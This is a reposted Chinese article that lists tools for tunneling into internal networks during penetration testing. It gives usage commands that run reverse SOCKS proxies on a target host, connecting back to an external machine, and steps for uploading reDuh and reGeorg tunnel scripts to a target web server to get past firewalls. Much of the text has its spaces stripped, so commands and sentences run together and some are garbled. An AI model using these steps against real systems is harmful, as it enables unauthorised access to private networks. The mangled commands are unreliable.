当前位置: 首页 > 科技观察

好用的内网渗透工具合集

时间:2023-03-19 16:10:42 科技观察

本文转载自微信公众号《绕过》,作者绕过。转载本文请联系旁路公众号。在渗透过程中,我们需要快速实现内网渗透,从而绕过网络访问限制,直接从外网访问内网。今天给大家推荐几款非常好用的内网渗透工具。如果您有其他建议,请补充并更正。1.ngrokngrok是一种反向代理,可在公共端点和本地运行的Web服务器之间建立安全通道。官网地址:https://ngrok.com使用步骤:(1)进入ngrok官网注册账号,下载ngrok。(2)在目标机器上,填写授权码,运行ngrok。./ngrokauthtoken授权码(3)转发HTTP隧道到本地80端口,如下图,可以通过外网域名访问本地80端口。./ngrokhttp802,frpfrp是一个高性能的反向代理应用,可以帮助你轻松穿透内网,对外网提供服务。支持tcp、http、https等协议类型,web服务支持基于域名的路由转发。Git项目地址:https://github.com/fatedier/frp使用步骤:(1)将frps和frps.ini放在一台有公网IP的机器上,修改frps.ini文件,配置一个反向服务器,名称为ssh到代理:#frps.ini[common]bind_port=7000[ssh]listen_port=6000auth_token=123(2)启动frps:./frps-c./frps.ini(3)把frpc和frpc.ini放在上machine在网络环境下,修改frpc.ini文件,设置frps所在服务器IP为x.x.x.x:#frpc.ini[common]server_addr=192.168.172.131server_port=7000auth_token=123[ssh]type=tcplocal_ip=127.0.0.1local_port=22remote_port=6000(4)启动frpc:./frpc-c./frpc.ini(5)通过ssh访问内网服务器,假设用户名为test:ssh-p6000test@x.x.x.x3,Sunny-ngrok一条命令解决外部不需要任何配置就可以从Internet访问内部网络。一条命令让外网访问你的内网不再遥远。ngrok客户端,支持Windows、Linux、Mac,并提供python、PHP等版本。官网地址:https://www.ngrok.cc使用步骤:(1)开启http隧道,设置隧道协议、本地端口等信息。(2)通过tunnelid启动隧道。(3)如果在公网访问域名,则可以访问内网网站。4.Natapp是一个基于ngrok的内网映射工具。免费版提供http、tcp、udp全隧道穿透,随机域名/随机TCP、UDP端口,强制更换域名/端口,不定时自定义本地端口。下载地址:https://natapp.cn(1)购买隧道,设置隧道协议和本地端口。(2)下载客户端,进入目标主机,运行natapp。(3)复制natapp分配的网址,在浏览器中访问,可以看到内网穿透成功!5、蚯蚓内网渗透EW是一款便携的网络渗透工具,带有SOCKSv5服务设置端口转发和端口转发两大核心功能,可以在复杂的网络环境下完成网络渗透。支持Windows、Linux、MacOS、Arm-Linux。项目地址:http://rootkiter.com/EarthWorm使用方法:(1)转发SOCKSv5服务器,适用于目标网络边界有公网IP且监听端口可任意开启。./ew-sssocksd-l1080(2)ReboundSOCKSv5server,适用于没有公网IP的目标网络边界,需要通过rebound创建socksproxya)首先在主机A上运行如下命令apublicIP:./ew-srcsocks-l1080-e8888b)在目标主机B上启动SOCKSv5服务,弹跳到公网主机的8888端口。/ew-srssocks-d1.1.1.1-e8888(3)multi-levelcascade,适用于多层次的复杂网络环境,将内网的深层服务转发到外网。##二级级联测试用例#方法一:使用lcx_tran$./ew-sssocksd-l9999$./ew-slcx_tran-l1080-f127.0.0.1-g9999#方法二:$./ew-slcx_listen-l1080-e8888$./ew-sssocksd-l9999$./ew-slcx_slave-d127.0.0.1-e8888-f127.0.0.1-g9999##三级级联测试用例$./ew-srcsocks-l1080-e8888$./ew-slcx_slave-d127.0.0.1-e8888-f127.0.0.1-g9999$./ew-slcx_listen-l9999-e7777$./ew-srssocks-d127.0.0.1-e77776,reDuhReDuh是一个是用于建立隧道以通过HTTP协议传输各种其他数据的工具。通过在服务器上上传JSP/PHP/ASP脚本,可以方便的连接到服务器后面的主机。github项目地址:https://github.com/sensepost/reDuh(1)上传服务端jsp脚本到目标机(2)服务端脚本上传后使用reDuh客户端连接地址。java-jarreDuhClient.jarhttp://192.168.172.1/reDuh.jsp7、reGeorgreGeorg是reDuh的继承者,使用session层的socks5协议,与Proxifier结合使用效率会更高。下载地址:https://github.com/sensepost/reGeorg使用方法:(一)1.上传隧道脚本(aspx|ashx|jsp|php)到web服务器,访问会显示“Georgsays,'Allseemsfine'”,说明脚本运行正常。(2)在攻击者机器上,启动reGeorgSocksProxy.py,监听9999端口,查看CheckingifGeorgisready,确认运行正常。8.TunnaTunna是一个了不起的工具,可以通过HTTP封装隧道传输任何TCP,用于绕过防火墙环境中的网络限制。github项目地址:https://github.com/SECFORCE/Tunna9,sSockssSocks是一个socks代理工具套件,可以用来开通socks代理服务,支持socks5验证,支持IPV6和UDP,提供反向socks代理服务,将远程电脑作为socks代理服务器,反弹回本地,极大方便了内网的渗透测试。下载地址:http://sourceforge.net/projects/ssocks/使用方法:(1)正向代理./ssocksd--bind192.168.172.131--port1234(2)反向代理##监听6020端口并转发to6010./rcsocks-l6020-p6010-vv##反向连接代理主机端口6010./rssocks-s192.168.172.131:6010-vv